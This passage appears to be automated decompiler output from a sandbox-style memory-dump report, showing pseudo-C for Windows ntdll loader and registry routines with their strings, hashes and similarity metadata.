                                                          															asm("movsd");
                                                          															 *_t118 =  *_t118 + 1;
                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                          															_t95 = E010E61A0( &_v32);
                                                          															__eflags = _t95;
                                                          															if(_t95 != 0) {
                                                          																__eflags = _v32 | _v28;
                                                          																if((_v32 | _v28) != 0) {
                                                          																	_t71 = _t118 + 0x40; // 0x3f
                                                          																	_t134 = _t71;
                                                          																	goto L55;
                                                          																}
                                                          															}
                                                          															goto L30;
                                                          														}
                                                          													}
                                                          													goto L56;
                                                          												}
                                                          												_t92 = 0x11a5c64 + _t91 * 8;
                                                          												asm("lock xadd [eax], ecx");
                                                          												_t131 = (_t129 | 0xffffffff) - 1;
                                                          												goto L37;
                                                          											}
                                                          										}
                                                          										goto L56;
                                                          									} else {
                                                          										_t143 = E010C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                          										__eflags = _t143;
                                                          										if(_t143 != 0) {
                                                          											_t157 = _v12;
                                                          											_t103 = 0;
                                                          											__eflags = 0;
                                                          											_t136 =  &(_t157[1]);
                                                          											 *(_t161 + 0x64) = _t136;
                                                          											_t151 =  *_t157;
                                                          											_v20 = _t136;
                                                          											while(1) {
                                                          												__eflags =  *((intOrPtr*)(0x11a5c60 + _t103 * 8)) - _t151;
                                                          												if( *((intOrPtr*)(0x11a5c60 + _t103 * 8)) == _t151) {
                                                          													break;
                                                          												}
                                                          												_t103 = _t103 + 1;
                                                          												__eflags = _t103 - 5;
                                                          												if(_t103 < 5) {
                                                          													continue;
                                                          												}
                                                          												L21:
                                                          												_t105 = E010FF380(_t136, 0x1091184, 0x10);
                                                          												__eflags = _t105;
                                                          												if(_t105 != 0) {
                                                          													__eflags =  *_t157 -  *_v16;
                                                          													if( *_t157 >=  *_v16) {
                                                          														goto L22;
                                                          													} else {
                                                          														asm("cdq");
                                                          														_t166 = _t157[5] & 0x0000ffff;
                                                          														_t108 = _t157[5] & 0x0000ffff;
                                                          														asm("cdq");
                                                          														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                          														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                          														if(__eflags > 0) {
                                                          															L29:
                                                          															E010D2280(_t108, 0x11a86cc);
                                                          															 *_t118 =  *_t118 + 1;
                                                          															_t42 = _t118 + 0x40; // 0x3f
                                                          															_t156 = _t42;
                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															asm("movsd");
                                                          															_t110 = E010E61A0( &_v32);
                                                          															__eflags = _t110;
                                                          															if(_t110 != 0) {
                                                          																__eflags = _v32 | _v28;
                                                          																if((_v32 | _v28) != 0) {
                                                          																	_t134 = _v20;
                                                          																	L55:
                                                          																	E01189D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                          																}
                                                          															}
                                                          															L30:
                                                          															 *_t118 =  *_t118 + 1;
                                                          															asm("adc dword [ebx+0x4], 0x0");
                                                          															E010CFFB0(_t118, _t156, 0x11a86cc);
                                                          															goto L22;
                                                          														} else {
                                                          															if(__eflags < 0) {
                                                          																goto L22;
                                                          															} else {
                                                          																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                          																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                          																	goto L22;
                                                          																} else {
                                                          																	goto L29;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          													goto L56;
                                                          												}
                                                          												goto L22;
                                                          											}
                                                          											asm("lock inc dword [eax]");
                                                          											goto L21;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						return _t143;
                                                          					}
                                                          				} else {
                                                          					_push( &_v8);
                                                          					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                          					_push(__ecx + 0x40);
                                                          					_push(_t121);
                                                          					_push(0xffffffff);
                                                          					_t80 = E010F9A00();
                                                          					_t159 = _t80;
                                                          					if(_t159 < 0) {
                                                          						L8:
                                                          						return _t80;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          				L56:
                                                          			}

                                                          Strings
                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 01119C28
                                                          • LdrpDoPostSnapWork, xrefs: 01119C1E
                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01119C18
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                          • API String ID: 2994545307-1948996284
                                                          • Opcode ID: d374909d52a43ed0e7d66cbe1004d445547f80d489ca85b6079b1f138bb02cc6
                                                          • Instruction ID: 73874d2587d934a539b0a4a15e4d56a3774b6ad689fdb452dbfd0b5a82c87acf
                                                          • Opcode Fuzzy Hash: d374909d52a43ed0e7d66cbe1004d445547f80d489ca85b6079b1f138bb02cc6
                                                          • Instruction Fuzzy Hash: 6B911631A0020AAFDF58DF59D880ABEBBF5FF40B14B4481AED985AB544E730E945CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E010C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                          				char _v8;
                                                          				intOrPtr _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v20;
                                                          				char _v24;
                                                          				signed int _t73;
                                                          				void* _t77;
                                                          				char* _t82;
                                                          				char* _t87;
                                                          				signed char* _t97;
                                                          				signed char _t102;
                                                          				intOrPtr _t107;
                                                          				signed char* _t108;
                                                          				intOrPtr _t112;
                                                          				intOrPtr _t124;
                                                          				intOrPtr _t125;
                                                          				intOrPtr _t126;
                                                          
                                                          				_t107 = __edx;
                                                          				_v12 = __ecx;
                                                          				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                          				_t124 = 0;
                                                          				_v20 = __edx;
                                                          				if(E010CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                          					_t112 = _v8;
                                                          				} else {
                                                          					_t112 = 0;
                                                          					_v8 = 0;
                                                          				}
                                                          				if(_t112 != 0) {
                                                          					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                          						_t124 = 0xc000007b;
                                                          						goto L8;
                                                          					}
                                                          					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                          					 *(_t125 + 0x34) = _t73;
                                                          					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                          						goto L3;
                                                          					}
                                                          					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                          					_t124 = E010BC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                          					if(_t124 < 0) {
                                                          						goto L8;
                                                          					} else {
                                                          						goto L3;
                                                          					}
                                                          				} else {
                                                          					L3:
                                                          					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                          						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                          						L8:
                                                          						return _t124;
                                                          					}
                                                          					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                          						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                          							goto L5;
                                                          						}
                                                          						_t102 =  *0x11a5780; // 0x0
                                                          						if((_t102 & 0x00000003) != 0) {
                                                          							E01135510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                          							_t102 =  *0x11a5780; // 0x0
                                                          						}
                                                          						if((_t102 & 0x00000010) != 0) {
                                                          							asm("int3");
                                                          						}
                                                          						_t124 = 0xc0000428;
                                                          						goto L8;
                                                          					}
                                                          					L5:
                                                          					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                          						goto L8;
                                                          					}
                                                          					_t77 = _a4 - 0x40000003;
                                                          					if(_t77 == 0 || _t77 == 0x33) {
                                                          						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                          						if(E010D7D50() != 0) {
                                                          							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                          						} else {
                                                          							_t82 = 0x7ffe0384;
                                                          						}
                                                          						_t108 = 0x7ffe0385;
                                                          						if( *_t82 != 0) {
                                                          							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                          								if(E010D7D50() == 0) {
                                                          									_t97 = 0x7ffe0385;
                                                          								} else {
                                                          									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                          								}
                                                          								if(( *_t97 & 0x00000020) != 0) {
                                                          									E01137016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                          								}
                                                          							}
                                                          						}
                                                          						if(_a4 != 0x40000003) {
                                                          							L14:
                                                          							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                          							if(E010D7D50() != 0) {
                                                          								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                          							} else {
                                                          								_t87 = 0x7ffe0384;
                                                          							}
                                                          							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                          								if(E010D7D50() != 0) {
                                                          									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                          								}
                                                          								if(( *_t108 & 0x00000020) != 0) {
                                                          									E01137016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                          								}
                                                          							}
                                                          							goto L8;
                                                          						} else {
                                                          							_v16 = _t125 + 0x24;
                                                          							_t124 = E010EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                          							if(_t124 < 0) {
                                                          								E010BB1E1(_t124, 0x1490, 0, _v16);
                                                          								goto L8;
                                                          							}
                                                          							goto L14;
                                                          						}
                                                          					} else {
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          			}
                                                          0x010c7f24
                                                          0x010c7f24
                                                          0x010c7f24
                                                          0x010c7f2c
                                                          0x0111996a
                                                          0x01119975
                                                          0x01119975
                                                          0x0111997e
                                                          0x01119993
                                                          0x01119993
                                                          0x0111997e
                                                          0x00000000
                                                          0x010c7ef2
                                                          0x010c7efc
                                                          0x010c7f0a
                                                          0x010c7f0e
                                                          0x01119933
                                                          0x00000000
                                                          0x01119933
                                                          0x00000000
                                                          0x010c7f0e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c7eb1

                                                          Strings
                                                          • minkernel\ntdll\ldrmap.c, xrefs: 011198A2
                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 01119891
                                                          • LdrpCompleteMapModule, xrefs: 01119898
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                          • API String ID: 0-1676968949
                                                          • Opcode ID: 721c8390d25e9e5d989e76f6e285850c86418e156e79750525ef2d57028aeee5
                                                          • Instruction ID: 78cfbce50914f63f5a4e4152af38e43a7d5ba3f0d6966685b5710864c7ba80ac
                                                          • Opcode Fuzzy Hash: 721c8390d25e9e5d989e76f6e285850c86418e156e79750525ef2d57028aeee5
                                                          • Instruction Fuzzy Hash: B451243260074ADBEB2ACB5DC954B6EBBE4AB05B18F0405ADE9A19B3D5D730ED00CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010BE620(void* __ecx, short* __edx, short* _a4) {
                                                          				char _v16;
                                                          				char _v20;
                                                          				intOrPtr _v24;
                                                          				char* _v28;
                                                          				char _v32;
                                                          				char _v36;
                                                          				char _v44;
                                                          				signed int _v48;
                                                          				intOrPtr _v52;
                                                          				void* _v56;
                                                          				void* _v60;
                                                          				char _v64;
                                                          				void* _v68;
                                                          				void* _v76;
                                                          				void* _v84;
                                                          				signed int _t59;
                                                          				signed int _t74;
                                                          				signed short* _t75;
                                                          				signed int _t76;
                                                          				signed short* _t78;
                                                          				signed int _t83;
                                                          				short* _t93;
                                                          				signed short* _t94;
                                                          				short* _t96;
                                                          				void* _t97;
                                                          				signed int _t99;
                                                          				void* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t80 = __ecx;
                                                          				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                          				_t96 = __edx;
                                                          				_v44 = __edx;
                                                          				_t78 = 0;
                                                          				_v56 = 0;
                                                          				if(__ecx == 0 || __edx == 0) {
                                                          					L28:
                                                          					_t97 = 0xc000000d;
                                                          				} else {
                                                          					_t93 = _a4;
                                                          					if(_t93 == 0) {
                                                          						goto L28;
                                                          					}
                                                          					_t78 = E010BF358(__ecx, 0xac);
                                                          					if(_t78 == 0) {
                                                          						_t97 = 0xc0000017;
                                                          						L6:
                                                          						if(_v56 != 0) {
                                                          							_push(_v56);
                                                          							E010F95D0();
                                                          						}
                                                          						if(_t78 != 0) {
                                                          							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                          						}
                                                          						return _t97;
                                                          					}
                                                          					E010FFA60(_t78, 0, 0x158);
                                                          					_v48 = _v48 & 0x00000000;
                                                          					_t102 = _t101 + 0xc;
                                                          					 *_t96 = 0;
                                                          					 *_t93 = 0;
                                                          					E010FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                          					_v36 = 0x18;
                                                          					_v28 =  &_v44;
                                                          					_v64 = 0;
                                                          					_push( &_v36);
                                                          					_push(0x20019);
                                                          					_v32 = 0;
                                                          					_push( &_v64);
                                                          					_v24 = 0x40;
                                                          					_v20 = 0;
                                                          					_v16 = 0;
                                                          					_t97 = E010F9600();
                                                          					if(_t97 < 0) {
                                                          						goto L6;
                                                          					}
                                                          					E010FBB40(0,  &_v36, L"InstallLanguageFallback");
                                                          					_push(0);
                                                          					_v48 = 4;
                                                          					_t97 = L010BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                          					if(_t97 >= 0) {
                                                          						if(_v52 != 1) {
                                                          							L17:
                                                          							_t97 = 0xc0000001;
                                                          							goto L6;
                                                          						}
                                                          						_t59 =  *_t78 & 0x0000ffff;
                                                          						_t94 = _t78;
                                                          						_t83 = _t59;
                                                          						if(_t59 == 0) {
                                                          							L19:
                                                          							if(_t83 == 0) {
                                                          								L23:
                                                          								E010FBB40(_t83, _t102 + 0x24, _t78);
                                                          								if(L010C43C0( &_v48,  &_v64) == 0) {
                                                          									goto L17;
                                                          								}
                                                          								_t84 = _v48;
                                                          								 *_v48 = _v56;
                                                          								if( *_t94 != 0) {
                                                          									E010FBB40(_t84, _t102 + 0x24, _t94);
                                                          									if(L010C43C0( &_v48,  &_v64) != 0) {
                                                          										 *_a4 = _v56;
                                                          									} else {
                                                          										_t97 = 0xc0000001;
                                                          										 *_v48 = 0;
                                                          									}
                                                          								}
                                                          								goto L6;
                                                          							}
                                                          							_t83 = _t83 & 0x0000ffff;
                                                          							while(_t83 == 0x20) {
                                                          								_t94 =  &(_t94[1]);
                                                          								_t74 =  *_t94 & 0x0000ffff;
                                                          								_t83 = _t74;
                                                          								if(_t74 != 0) {
                                                          									continue;
                                                          								}
                                                          								goto L23;
                                                          							}
                                                          							goto L23;
                                                          						} else {
                                                          							goto L14;
                                                          						}
                                                          						while(1) {
                                                          							L14:
                                                          							_t27 =  &(_t94[1]); // 0x2
                                                          							_t75 = _t27;
                                                          							if(_t83 == 0x2c) {
                                                          								break;
                                                          							}
                                                          							_t94 = _t75;
                                                          							_t76 =  *_t94 & 0x0000ffff;
                                                          							_t83 = _t76;
                                                          							if(_t76 != 0) {
                                                          								continue;
                                                          							}
                                                          							goto L23;
                                                          						}
                                                          						 *_t94 = 0;
                                                          						_t94 = _t75;
                                                          						_t83 =  *_t75 & 0x0000ffff;
                                                          						goto L19;
                                                          					}
                                                          				}
                                                          			}

                                                          Strings
                                                          • InstallLanguageFallback, xrefs: 010BE6DB
                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 010BE68C
                                                          • @, xrefs: 010BE6C0
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                          • API String ID: 0-1757540487
                                                          • Opcode ID: 6f2131fc5bc4c99dedde5461048acca8997c6c2f00900880be594d5e66bd7e9b
                                                          • Instruction ID: 5c433435fd827ebf4c44a846dda3a873a7e379341cec5ca1dd07d2f460d8b457
                                                          • Opcode Fuzzy Hash: 6f2131fc5bc4c99dedde5461048acca8997c6c2f00900880be594d5e66bd7e9b
                                                          • Instruction Fuzzy Hash: 5051B1725083069BD754DF68C480AABB7E9BF89614F05092EFAC5E7640F734D904CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 60%
                                                          			E0117E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                          				signed int _v20;
                                                          				char _v24;
                                                          				signed int _v40;
                                                          				char _v44;
                                                          				intOrPtr _v48;
                                                          				signed int _v52;
                                                          				unsigned int _v56;
                                                          				char _v60;
                                                          				signed int _v64;
                                                          				char _v68;
                                                          				signed int _v72;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				char _t87;
                                                          				signed int _t90;
                                                          				signed int _t94;
                                                          				signed int _t100;
                                                          				intOrPtr* _t113;
                                                          				signed int _t122;
                                                          				void* _t132;
                                                          				void* _t135;
                                                          				signed int _t139;
                                                          				signed int* _t141;
                                                          				signed int _t146;
                                                          				signed int _t147;
                                                          				void* _t153;
                                                          				signed int _t155;
                                                          				signed int _t159;
                                                          				char _t166;
                                                          				void* _t172;
                                                          				void* _t176;
                                                          				signed int _t177;
                                                          				intOrPtr* _t179;
                                                          
                                                          				_t179 = __ecx;
                                                          				_v48 = __edx;
                                                          				_v68 = 0;
                                                          				_v72 = 0;
                                                          				_push(__ecx[1]);
                                                          				_push( *__ecx);
                                                          				_push(0);
                                                          				_t153 = 0x14;
                                                          				_t135 = _t153;
                                                          				_t132 = E0117BBBB(_t135, _t153);
                                                          				if(_t132 == 0) {
                                                          					_t166 = _v68;
                                                          					goto L43;
                                                          				} else {
                                                          					_t155 = 0;
                                                          					_v52 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v56 = __ecx[1];
                                                          					if( *__ecx >> 8 < 2) {
                                                          						_t155 = 1;
                                                          						_v52 = 1;
                                                          					}
                                                          					_t139 = _a4;
                                                          					_t87 = (_t155 << 0xc) + _t139;
                                                          					_v60 = _t87;
                                                          					if(_t87 < _t139) {
                                                          						L11:
                                                          						_t166 = _v68;
                                                          						L12:
                                                          						if(_t132 != 0) {
                                                          							E0117BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                          						}
                                                          						L43:
                                                          						if(_v72 != 0) {
                                                          							_push( *((intOrPtr*)(_t179 + 4)));
                                                          							_push( *_t179);
                                                          							_push(0x8000);
                                                          							E0117AFDE( &_v72,  &_v60);
                                                          						}
                                                          						L46:
                                                          						return _t166;
                                                          					}
                                                          					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                          					asm("sbb edi, edi");
                                                          					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                          					if(_t90 != 0) {
                                                          						_push(0);
                                                          						_push(0x14);
                                                          						_push( &_v44);
                                                          						_push(3);
                                                          						_push(_t179);
                                                          						_push(0xffffffff);
                                                          						if(E010F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                          							_push(_t139);
                                                          							E0117A80D(_t179, 1, _v40, 0);
                                                          							_t172 = 4;
                                                          						}
                                                          					}
                                                          					_t141 =  &_v72;
                                                          					if(E0117A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                          						_v64 = _a4;
                                                          						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                          						asm("sbb edi, edi");
                                                          						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                          						if(_t94 != 0) {
                                                          							_push(0);
                                                          							_push(0x14);
                                                          							_push( &_v24);
                                                          							_push(3);
                                                          							_push(_t179);
                                                          							_push(0xffffffff);
                                                          							if(E010F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                          								_push(_t141);
                                                          								E0117A80D(_t179, 1, _v20, 0);
                                                          								_t176 = 4;
                                                          							}
                                                          						}
                                                          						if(E0117A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_t177 = _v64;
                                                          							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                          							_t100 = _v52 + _v52;
                                                          							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                          							 *(_t132 + 0x10) = _t146;
                                                          							asm("bsf eax, [esp+0x18]");
                                                          							_v52 = _t100;
                                                          							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                          							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                          							_t47 =  &_a8;
                                                          							 *_t47 = _a8 & 0x00000001;
                                                          							if( *_t47 == 0) {
                                                          								E010D2280(_t179 + 0x30, _t179 + 0x30);
                                                          							}
                                                          							_t147 =  *(_t179 + 0x34);
                                                          							_t159 =  *(_t179 + 0x38) & 1;
                                                          							_v68 = 0;
                                                          							if(_t147 == 0) {
                                                          								L35:
                                                          								E010CB090(_t179 + 0x34, _t147, _v68, _t132);
                                                          								if(_a8 == 0) {
                                                          									E010CFFB0(_t132, _t177, _t179 + 0x30);
                                                          								}
                                                          								asm("lock xadd [eax], ecx");
                                                          								asm("lock xadd [eax], edx");
                                                          								_t132 = 0;
                                                          								_v72 = _v72 & 0;
                                                          								_v68 = _v72;
                                                          								if(E010D7D50() == 0) {
                                                          									_t113 = 0x7ffe0388;
                                                          								} else {
                                                          									_t177 = _v64;
                                                          									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                          								}
                                                          								if( *_t113 == _t132) {
                                                          									_t166 = _v68;
                                                          									goto L46;
                                                          								} else {
                                                          									_t166 = _v68;
                                                          									E0116FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                          									goto L12;
                                                          								}
                                                          							} else {
                                                          								L23:
                                                          								while(1) {
                                                          									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                          										_t122 =  *_t147;
                                                          										if(_t159 == 0) {
                                                          											L32:
                                                          											if(_t122 == 0) {
                                                          												L34:
                                                          												_v68 = 0;
                                                          												goto L35;
                                                          											}
                                                          											L33:
                                                          											_t147 = _t122;
                                                          											continue;
                                                          										}
                                                          										if(_t122 == 0) {
                                                          											goto L34;
                                                          										}
                                                          										_t122 = _t122 ^ _t147;
                                                          										goto L32;
                                                          									}
                                                          									_t122 =  *(_t147 + 4);
                                                          									if(_t159 == 0) {
                                                          										L27:
                                                          										if(_t122 != 0) {
                                                          											goto L33;
                                                          										}
                                                          										L28:
                                                          										_v68 = 1;
                                                          										goto L35;
                                                          									}
                                                          									if(_t122 == 0) {
                                                          										goto L28;
                                                          									}
                                                          									_t122 = _t122 ^ _t147;
                                                          									goto L27;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					_v72 = _v72 & 0x00000000;
                                                          					goto L11;
                                                          				}
                                                          			}





































                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `$`
                                                          • API String ID: 0-197956300
                                                          • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                          • Instruction ID: ac05755f5c0d3e27286849cedaf07305ed5e30ec60031f22bb0bedc936ede21c
                                                          • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                          • Instruction Fuzzy Hash: 08917E712057429BE728CF29C841B5BBBF6AF84714F18896DF695CB380E774E904CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 77%
                                                          			E011351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed short* _t63;
                                                          				signed int _t64;
                                                          				signed int _t65;
                                                          				signed int _t67;
                                                          				intOrPtr _t74;
                                                          				intOrPtr _t84;
                                                          				intOrPtr _t88;
                                                          				intOrPtr _t94;
                                                          				void* _t100;
                                                          				void* _t103;
                                                          				intOrPtr _t105;
                                                          				signed int _t106;
                                                          				short* _t108;
                                                          				signed int _t110;
                                                          				signed int _t113;
                                                          				signed int* _t115;
                                                          				signed short* _t117;
                                                          				void* _t118;
                                                          				void* _t119;
                                                          
                                                          				_push(0x80);
                                                          				_push(0x11905f0);
                                                          				E0110D0E8(__ebx, __edi, __esi);
                                                          				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                          				_t115 =  *(_t118 + 0xc);
                                                          				 *(_t118 - 0x7c) = _t115;
                                                          				 *((char*)(_t118 - 0x65)) = 0;
                                                          				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                          				_t113 = 0;
                                                          				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                          				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                          				_t100 = __ecx;
                                                          				if(_t100 == 0) {
                                                          					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                          					E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                          					 *((char*)(_t118 - 0x65)) = 1;
                                                          					_t63 =  *(_t118 - 0x90);
                                                          					_t101 = _t63[2];
                                                          					_t64 =  *_t63 & 0x0000ffff;
                                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                          					L20:
                                                          					_t65 = _t64 >> 1;
                                                          					L21:
                                                          					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                          					if(_t108 == 0) {
                                                          						L27:
                                                          						 *_t115 = _t65 + 1;
                                                          						_t67 = 0xc0000023;
                                                          						L28:
                                                          						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                          						L29:
                                                          						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                          						E011353CA(0);
                                                          						return E0110D130(0, _t113, _t115);
                                                          					}
                                                          					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                          						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                          							 *_t108 = 0;
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					 *_t115 = _t65;
                                                          					_t115 = _t65 + _t65;
                                                          					E010FF3E0(_t108, _t101, _t115);
                                                          					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                          					_t67 = 0;
                                                          					goto L28;
                                                          				}
                                                          				_t103 = _t100 - 1;
                                                          				if(_t103 == 0) {
                                                          					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                          					_t74 = E010D3690(1, _t117, 0x1091810, _t118 - 0x74);
                                                          					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                          					_t101 = _t117[2];
                                                          					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                          					if(_t74 < 0) {
                                                          						_t64 =  *_t117 & 0x0000ffff;
                                                          						_t115 =  *(_t118 - 0x7c);
                                                          						goto L20;
                                                          					}
                                                          					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                          					_t115 =  *(_t118 - 0x7c);
                                                          					goto L21;
                                                          				}
                                                          				if(_t103 == 1) {
                                                          					_t105 = 4;
                                                          					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                          					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                          					_push(_t118 - 0x70);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(_t105);
                                                          					_push(_t118 - 0x78);
                                                          					_push(0x6b);
                                                          					 *((intOrPtr*)(_t118 - 0x64)) = E010FAA90();
                                                          					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                          					_t113 = L010D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                          					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                          					if(_t113 != 0) {
                                                          						_push(_t118 - 0x70);
                                                          						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                          						_push(_t113);
                                                          						_push(4);
                                                          						_push(_t118 - 0x78);
                                                          						_push(0x6b);
                                                          						_t84 = E010FAA90();
